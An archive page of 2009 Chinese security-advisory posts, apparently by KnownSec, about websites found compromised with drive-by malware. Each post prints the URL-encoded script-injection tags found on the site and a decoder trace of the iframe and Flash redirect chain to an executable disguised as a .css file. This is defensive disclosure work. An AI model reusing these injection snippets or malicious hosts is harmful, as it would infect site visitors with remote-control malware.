                        [script]http://44ghe.cn/x2/of.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [script]http://44ghe.cn/x2/of3.jpg
                        [script]http://44ghe.cn/x2/of.jpg
                        [script]http://44ghe.cn/x2/of2.jpg
                [iframe]http://44ghe.cn/x2/ytu.htm
                    [iframe]http://44ghe.cn/x2/ytfl.htm
                        [iframe]http://44ghe.cn/x2/ff.html
                            [script]http://44ghe.cn/x2/ff.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://44ghe.cn/x2/ie.html
                            [script]http://44ghe.cn/x2/ie.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://44ghe.cn/x2/ff.html
                        [iframe]http://44ghe.cn/x2/ie.html
                        [iframe]http://44ghe.cn/x2/ff.html
                        [iframe]http://44ghe.cn/x2/ff.html
    [script]http://zgunion.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://nmgzlt.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://shenglve.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://egenome.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://clannt.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://513148.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://youdunzi.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://82048.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://czjjzc.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://linksnet.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://wuxiol.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://chunrang.com.cn
        [iframe]http://sale.php?domain=chunrang.com.cn
    [script]http://hn3gp.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://hhhtlive.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
最终下载病毒文件：
http://d.lnxwy.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司 www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 24 Oct 2009 No Comments

我的成都被植入恶意代码

发布时间：Thu Oct 22 2009 17:39:17 UTC+0800
最后更新时间：Thu Oct 22 2009 17:39:17 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获我的成都（http://www.mycdu.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.mycdu.com/

网页被嵌入恶意链接代码：
<script src=http://%7A%67%75%6E%69%6F%6E%2E%63%6E></script><script src=http://%6E%6D%67%7A%6C%74%2E%63%6E></script><script src=http://%73%68%65%6E%67%6C%76%65%2E%63%6E></script><script src=http://%65%67%65%6E%6F%6D%65%2E%63%6E></script><script src=http://%63%6C%61%6E%6E%74%2E%63%6E></script><script src=http://%35%31%33%31%34%38%2E%63%6E></script><script src=http://%79%6F%75%64%75%6E%7A%69%2E%63%6E></script><script src=http://%382%30%34%38.cn></script><script src=http://%63%7A%6Aj%7Ac.%63%6E></script><script src=http://lin%6Bsn%65%74%2Ecn></script><script src=http://%77u%78io%6C.c%6E></script><script src=http://%63hun%72an%67%2E%63%6F%6D%2Ecn></script><script src=http://hn3%67%70.c%6E></script><script src=http://f%75jia%6Eclu%62.cn></script>

挂马分析：
[root]http://www.mycdu.com/
    [script]http://zgunion.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://nmgzlt.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://shenglve.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://egenome.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://clannt.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://513148.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://youdunzi.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://82048.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://czjjzc.cn
        [iframe]http://new1.8866.org/dszq/2.htm
            [iframe]http://11dgef.cn/x2/xx.html
                [iframe]http://11dgef.cn/x2/td14.htm
                    [script]http://11dgef.cn/x2/14.js
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://11dgef.cn/x2/15.js
                    [script]http://11dgef.cn/x2/17.js
                    [script]http://11dgef.cn/x2/16.js
                    [script]http://11dgef.cn/x2/18.js
                [iframe]http://11dgef.cn/x2/yt.htm
                    [script]http://11dgef.cn/x2/pps.jpg
                    [script]http://11dgef.cn/x2/url.jpg
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://11dgef.cn/x2/c.jpg
                    [script]http://11dgef.cn/x2/d.jpg
                    [script]http://11dgef.cn/x2/e.jpg
                    [script]http://11dgef.cn/x2/f.jpg
                [iframe]http://11dgef.cn/x2/td09.htm
                    [script]http://11dgef.cn/x2/01.js
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://11dgef.cn/x2/02.js
                [iframe]http://11dgef.cn/x2/yut.htm
                    [iframe]http://11dgef.cn/x2/ytfl1.htm
                        [iframe]http://11dgef.cn/x2/x1.htm
                            [script]http://11dgef.cn/x2/swfobject.js
                            [flash]http://11dgef.cn/x2/./x1.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://11dgef.cn/x2/./x3.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://11dgef.cn/x2/./x4.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://11dgef.cn/x2/./x2.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://11dgef.cn/x2/x2.htm
                            [script]http://11dgef.cn/x2/swfobject.js
                            [flash]http://11dgef.cn/x2/./x7.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://11dgef.cn/x2/./x9.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://11dgef.cn/x2/./x10.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://11dgef.cn/x2/./x8.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://11dgef.cn/x2/x1.htm
                    [iframe]http://11dgef.cn/x2/of.htm
                        [script]http://11dgef.cn/x2/of.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [script]http://11dgef.cn/x2/of3.jpg
                        [script]http://11dgef.cn/x2/of.jpg
                        [script]http://11dgef.cn/x2/of2.jpg
                [iframe]http://11dgef.cn/x2/ytu.htm
                    [iframe]http://11dgef.cn/x2/ytfl.htm
                        [iframe]http://11dgef.cn/x2/ff.html
                            [script]http://11dgef.cn/x2/ff.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://11dgef.cn/x2/ie.html
                            [script]http://11dgef.cn/x2/ie.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://11dgef.cn/x2/ff.html
                        [iframe]http://11dgef.cn/x2/ie.html
                        [iframe]http://11dgef.cn/x2/ff.html
                        [iframe]http://11dgef.cn/x2/ff.html
    [script]http://linksnet.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://wuxiol.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://chunrang.com.cn
        [iframe]http://sale.php?domain=chunrang.com.cn
    [script]http://hn3gp.cn
        [iframe]http://new1.8866.org/dszq/2.htm
    [script]http://fujianclub.cn
        [iframe]http://new1.8866.org/dszq/2.htm
最终下载病毒文件：
http://d.iopqw.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：23
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司 www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 22 Oct 2009 No Comments

中国质量维权协作网被植入恶意代码

发布时间：Wed Oct 21 2009 18:46:58 UTC+0800
最后更新时间：Wed Oct 21 2009 18:46:58 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获中国质量维权协作网（http://www.51315.com.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.51315.com.cn/

网页被嵌入恶意链接代码：
<script src=http://%77%75%78%69%66%64%63%2E%63%6E></script><script src=http://%7A%67%75%6E%69%6F%6E%2E%63%6E></script><script src=http://%68%6F%68%68%6F%74%6A%6F%62%2E%63%6E></script><script src=http://%6E%6D%67%7A%6C%74%2E%63%6E></script><script src=http://%73%68%65%6E%67%6C%76%65%2E%63%6E></script><script src=http://%65%67%65%6E%6F%6D%65%2E%63%6E></script><script src=http://%65%67%65%6E%6F%6D%65%2E%63%6E></script><script src=http://%63%6C%61%6E%6E%74%2E%63%6E></script><script src=http://%35%31%33%31%34%38%2E%63%6E></script><script src=http://%79%6F%75%64%75%6E%7A%69%2E%63%6E></script><script src=http://8204%38.%63n></script><script src=http://czj%6A%7Ac%2Ec%6E></script><script src=http://%6Cink%73ne%74%2Ec%6E></script><script src=http://%77u%78%69ol%2Ec%6E></script><script src=http://%63h%75%6Era%6E%67.co%6D%2E%63%6E></script><script src=http://hn%33gp.%63n></script>

挂马分析：
Log generated by issmall use mdecoder 0.30
[root]http://www.51315.com.cn/
    [script]http://wuxifdc.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://zgunion.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://hohhotjob.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://nmgzlt.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://shenglve.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://egenome.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://egenome.cn
    [script]http://clannt.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://513148.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://youdunzi.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://82048.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://czjjzc.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://linksnet.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://wuxiol.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
    [script]http://chunrang.com.cn
        [iframe]http://sale.php?domain=chunrang.com.cn
    [script]http://hn3gp.cn
        [iframe]http://ca86.8866.org/dszq/2.htm
            [iframe]http://0os0d.cn/x2/xx.html
                [iframe]http://0os0d.cn/x2/td14.htm
                    [script]http://0os0d.cn/x2/14.js
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://0os0d.cn/x2/15.js
                    [script]http://0os0d.cn/x2/17.js
                    [script]http://0os0d.cn/x2/16.js
                    [script]http://0os0d.cn/x2/18.js
                [iframe]http://0os0d.cn/x2/yt.htm
                    [script]http://0os0d.cn/x2/pps.jpg
                    [script]http://0os0d.cn/x2/url.jpg
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://0os0d.cn/x2/c.jpg
                    [script]http://0os0d.cn/x2/d.jpg
                    [script]http://0os0d.cn/x2/e.jpg
                    [script]http://0os0d.cn/x2/f.jpg
                [iframe]http://0os0d.cn/x2/td09.htm
                    [script]http://0os0d.cn/x2/01.js
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://0os0d.cn/x2/02.js
                [iframe]http://0os0d.cn/x2/yut.htm
                    [iframe]http://0os0d.cn/x2/ytfl1.htm
                        [iframe]http://0os0d.cn/x2/x1.htm
                            [script]http://0os0d.cn/x2/swfobject.js
                            [flash]http://0os0d.cn/x2/./x1.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x3.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x4.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x2.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://0os0d.cn/x2/x2.htm
                            [script]http://0os0d.cn/x2/swfobject.js
                            [flash]http://0os0d.cn/x2/./x7.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x9.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x10.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://0os0d.cn/x2/./x8.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://0os0d.cn/x2/x1.htm
                    [iframe]http://0os0d.cn/x2/of.htm
                        [script]http://0os0d.cn/x2/of.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [script]http://0os0d.cn/x2/of3.jpg
                        [script]http://0os0d.cn/x2/of.jpg
                        [script]http://0os0d.cn/x2/of2.jpg
                [iframe]http://0os0d.cn/x2/ytu.htm
                    [iframe]http://0os0d.cn/x2/ytfl.htm
                        [iframe]http://0os0d.cn/x2/ff.html
                            [script]http://0os0d.cn/x2/ff.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://0os0d.cn/x2/ie.html
                            [script]http://0os0d.cn/x2/ie.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://0os0d.cn/x2/ff.html
                        [iframe]http://0os0d.cn/x2/ie.html
                        [iframe]http://0os0d.cn/x2/ff.html
                        [iframe]http://0os0d.cn/x2/ff.html
    [script]http://wuxifdc.cn
    [script]http://zgunion.cn
    [script]http://hohhotjob.cn
    [script]http://nmgzlt.cn
    [script]http://shenglve.cn
    [script]http://egenome.cn
    [script]http://egenome.cn
    [script]http://clannt.cn
    [script]http://513148.cn
    [script]http://youdunzi.cn
    [script]http://82048.cn
    [script]http://czjjzc.cn
    [script]http://linksnet.cn
    [script]http://wuxiol.cn
    [script]http://chunrang.com.cn
    [script]http://hn3gp.cn
    [script]http://wuxifdc.cn
    [script]http://zgunion.cn
    [script]http://hohhotjob.cn
    [script]http://nmgzlt.cn
    [script]http://shenglve.cn
    [script]http://egenome.cn
    [script]http://egenome.cn
    [script]http://clannt.cn
    [script]http://513148.cn
    [script]http://youdunzi.cn
    [script]http://82048.cn
    [script]http://czjjzc.cn
    [script]http://linksnet.cn
    [script]http://wuxiol.cn
    [script]http://chunrang.com.cn
    [script]http://hn3gp.cn
    [script]http://wuxifdc.cn
    [script]http://zgunion.cn
    [script]http://hohhotjob.cn
    [script]http://nmgzlt.cn
    [script]http://shenglve.cn
    [script]http://egenome.cn
    [script]http://egenome.cn
    [script]http://clannt.cn
    [script]http://513148.cn
    [script]http://youdunzi.cn
    [script]http://82048.cn
    [script]http://czjjzc.cn
    [script]http://linksnet.cn
    [script]http://wuxiol.cn
    [script]http://chunrang.com.cn
    [script]http://hn3gp.cn
最终下载病毒文件：
http://d.iopqw.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：12
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司 www.knownsec.com

Popularity: 7% [?]

网站挂马记录 lk 21 Oct 2009 No Comments

当代体育杂志社官方网站被植入恶意代码

发布时间：Tue Oct 20 2009 19:20:34 UTC+0800
最后更新时间：Tue Oct 20 2009 19:20:34 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获当代体育杂志社官方网站（http://modernsports.com.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://modernsports.com.cn/

网页被嵌入恶意链接代码：
<script src=http://%73%68%65%6E%67%6C%76%65%2E%63%6E></script><script src=http://%63%6C%61%6E%6E%74%2E%63%6E></script><script src=http://%35%31%33%31%34%38%2E%63%6E></script><script src=http://%79%6F%75%64%75%6E%7A%69%2E%63%6E></script><script src=http://%63%7Aj%6A%7A%63.%63%6E></script><script src=http://%6Cin%6B%73%6E%65t.%63n></script><script src=http://%77%75%78iol%2Ec%6E></script><script src=http://%77%75%78iol%2Ec%6E></script>

挂马分析：
[root]http://modernsports.com.cn/
    [script]http://shenglve.cn
        [iframe]http://flxh.2288.org/dszq/2.htm
    [script]http://clannt.cn
        [iframe]http://flxh.2288.org/dszq/2.htm
            [iframe]http://h8ae8.cn/x2/xx.html
                [iframe]http://h8ae8.cn/x2/td14.htm
                    [script]http://h8ae8.cn/x2/14.js
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://h8ae8.cn/x2/15.js
                    [script]http://h8ae8.cn/x2/17.js
                    [script]http://h8ae8.cn/x2/16.js
                    [script]http://h8ae8.cn/x2/18.js
                [iframe]http://h8ae8.cn/x2/yt.htm
                    [script]http://h8ae8.cn/x2/pps.jpg
                    [script]http://h8ae8.cn/x2/url.jpg
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://h8ae8.cn/x2/c.jpg
                    [script]http://h8ae8.cn/x2/d.jpg
                    [script]http://h8ae8.cn/x2/e.jpg
                    [script]http://h8ae8.cn/x2/f.jpg
                [iframe]http://h8ae8.cn/x2/td09.htm
                    [script]http://h8ae8.cn/x2/01.js
                        [exe]http://d.iopqw.com/xx/x2.css
                    [script]http://h8ae8.cn/x2/02.js
                [iframe]http://h8ae8.cn/x2/yut.htm
                    [iframe]http://h8ae8.cn/x2/ytfl1.htm
                        [iframe]http://h8ae8.cn/x2/x1.htm
                            [script]http://h8ae8.cn/x2/swfobject.js
                            [flash]http://h8ae8.cn/x2/./x1.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://h8ae8.cn/x2/./x3.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://h8ae8.cn/x2/./x4.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://h8ae8.cn/x2/./x2.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://h8ae8.cn/x2/x2.htm
                            [script]http://h8ae8.cn/x2/swfobject.js
                            [flash]http://h8ae8.cn/x2/./x7.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://h8ae8.cn/x2/./x9.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://h8ae8.cn/x2/./x10.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                            [flash]http://h8ae8.cn/x2/./x8.swf
                                [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://h8ae8.cn/x2/x1.htm
                    [iframe]http://h8ae8.cn/x2/of.htm
                        [script]http://h8ae8.cn/x2/of.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [script]http://h8ae8.cn/x2/of3.jpg
                        [script]http://h8ae8.cn/x2/of.jpg
                        [script]http://h8ae8.cn/x2/of2.jpg
                [iframe]http://h8ae8.cn/x2/ytu.htm
                    [iframe]http://h8ae8.cn/x2/ytfl.htm
                        [iframe]http://h8ae8.cn/x2/ff.html
                            [script]http://h8ae8.cn/x2/ff.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://h8ae8.cn/x2/ie.html
                            [script]http://h8ae8.cn/x2/ie.js
                            [exe]http://d.iopqw.com/xx/x2.css
                        [iframe]http://h8ae8.cn/x2/ff.html
                        [iframe]http://h8ae8.cn/x2/ie.html
                        [iframe]http://h8ae8.cn/x2/ff.html
                        [iframe]http://h8ae8.cn/x2/ff.html
    [script]http://513148.cn
        [iframe]http://flxh.2288.org/dszq/2.htm
    [script]http://youdunzi.cn
        [iframe]http://flxh.2288.org/dszq/2.htm
    [script]http://czjjzc.cn
        [iframe]http://flxh.2288.org/dszq/2.htm
    [script]http://linksnet.cn
        [iframe]http://flxh.2288.org/dszq/2.htm
    [script]http://wuxiol.cn
        [iframe]http://flxh.2288.org/dszq/2.htm
    [script]http://wuxiol.cn
最终下载病毒文件：
http://d.iopqw.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：6
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司 www.knownsec.com

Popularity: 7% [?]

网站挂马记录 lk 20 Oct 2009 No Comments

中国脚本网被植入恶意代码

发布时间：Tue Oct 20 2009 19:06:43 UTC+0800
最后更新时间：Tue Oct 20 2009 19:06:43 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获中国脚本网（http://www.jiaoben.net/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.jiaoben.net/

网页被嵌入恶意链接代码：
<script language=”JavaScript” id=”scr7ipt7467″ src=”http://pt9%328.9966.org” type=”text/javascript” ></script>
<script language=”JavaScript” type=”text/javascript” id=”scripst9001″ src=”http://fd105.3322.o%72g“ ></script>
<script language=”JavaScript” type=”text/javascript” id=”microsoft7427″ src=”http://fd106%2E3322%2Eorg“ ></script>

挂马分析：
[root]http://www.jiaoben.net/
    [script]http://www.jiaoben.net/common/script/vdcs.js
        [script]http://fd106.3322.org
        [script]http://fd105.3322.org
        [script]http://pt928.9966.org
    [script]http://www.jiaoben.net/common/script/vdcs.pop.js
        [script]http://fd106.3322.org
        [script]http://fd105.3322.org
        [script]http://pt928.9966.org
    [script]http://www.jiaoben.net/common/script/joekoe_cms.js
        [script]http://fd106.3322.org
        [script]http://fd105.3322.org
        [script]http://pt928.9966.org
    [script]http://pt928.9966.org
        [iframe]http://jz1014.3322.org/jj/4.htm
            [iframe]http://h8ae8.cn/x15/xx.html
                [iframe]http://h8ae8.cn/x15/td14.htm
                    [script]http://h8ae8.cn/x15/14.js
                        [exe]http://d.iopqw.com/xx/x15.css
                    [script]http://h8ae8.cn/x15/15.js
                    [script]http://h8ae8.cn/x15/17.js
                    [script]http://h8ae8.cn/x15/16.js
                    [script]http://h8ae8.cn/x15/18.js
                [iframe]http://h8ae8.cn/x15/yt.htm
                    [script]http://h8ae8.cn/x15/pps.jpg
                    [script]http://h8ae8.cn/x15/url.jpg
                        [exe]http://d.iopqw.com/xx/x15.css
                    [script]http://h8ae8.cn/x15/c.jpg
                    [script]http://h8ae8.cn/x15/d.jpg
                    [script]http://h8ae8.cn/x15/e.jpg
                    [script]http://h8ae8.cn/x15/f.jpg
                [iframe]http://h8ae8.cn/x15/td09.htm
                    [script]http://h8ae8.cn/x15/01.js
                        [exe]http://d.iopqw.com/xx/x15.css
                    [script]http://h8ae8.cn/x15/02.js
                [iframe]http://h8ae8.cn/x15/yut.htm
                    [iframe]http://h8ae8.cn/x15/ytfl1.htm
                        [iframe]http://h8ae8.cn/x15/x1.htm
                            [script]http://h8ae8.cn/x15/swfobject.js
                            [flash]http://h8ae8.cn/x15/./x1.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x3.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x4.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x2.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                        [iframe]http://h8ae8.cn/x15/x2.htm
                            [script]http://h8ae8.cn/x15/swfobject.js
                            [flash]http://h8ae8.cn/x15/./x7.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x9.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x10.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                            [flash]http://h8ae8.cn/x15/./x8.swf
                                [exe]http://d.iopqw.com/xx/x15.css
                        [iframe]http://h8ae8.cn/x15/x1.htm
                    [iframe]http://h8ae8.cn/x15/of.htm
                        [script]http://h8ae8.cn/x15/of.js
                            [exe]http://d.iopqw.com/xx/x15.css
                        [script]http://h8ae8.cn/x15/of3.jpg
                        [script]http://h8ae8.cn/x15/of.jpg
                        [script]http://h8ae8.cn/x15/of2.jpg
                [iframe]http://h8ae8.cn/x15/ytu.htm
                    [iframe]http://h8ae8.cn/x15/ytfl.htm
                        [iframe]http://h8ae8.cn/x15/ff.html
                            [script]http://h8ae8.cn/x15/ff.js
                            [exe]http://d.iopqw.com/xx/x15.css
                        [iframe]http://h8ae8.cn/x15/ie.html
                            [script]http://h8ae8.cn/x15/ie.js
                            [exe]http://d.iopqw.com/xx/x15.css
                        [iframe]http://h8ae8.cn/x15/ff.html
                        [iframe]http://h8ae8.cn/x15/ie.html
                        [iframe]http://h8ae8.cn/x15/ff.html
                        [iframe]http://h8ae8.cn/x15/ff.html
    [script]http://fd105.3322.org
        [iframe]http://jz1014.3322.org/jj/4.htm
    [script]http://fd106.3322.org
    [script]http://www.jiaoben.net/skin/default/shop/shop.js
        [script]http://fd106.3322.org
        [script]http://fd105.3322.org
        [script]http://pt928.9966.org
    [iframe]http://spcode.baidu.com/spcode/spstyle/style2927.jsp?tn=jiaoben_sp&ctn=0&styleid=2927
    [script]http://pt928.9966.org
    [script]http://fd105.3322.org
    [script]http://fd106.3322.org
    [script]http://www.jiaoben.net/support/vote.asp
        [script]http://pt928.9966.org
        [script]http://fd105.3322.org
        [script]http://fd106.3322.org
    [script]http://www.jiaoben.net/xml/links.asp?sort=fir
    [script]http://www.jiaoben.net/xml/links.asp?sort=fir_txt
    [script]http://js.users.51.la/1147560.js
最终下载病毒文件：
http://d.iopqw.com/xx/x15.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：11
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司 www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 20 Oct 2009 No Comments

我们提供更安全的互联网

Archive for October, 2009

中国马业网被植入恶意代码

游戏365被植入恶意代码

中国医学教育网被植入恶意代码

西安电子科技大学被植入恶意代码

廊坊都市网被植入恶意代码

北京市育成才自考书店被植入恶意代码

我的成都被植入恶意代码

中国质量维权协作网被植入恶意代码

当代体育杂志社官方网站被植入恶意代码

中国脚本网被植入恶意代码

Blogroll

Categories

Meta

Archives

Recent Posts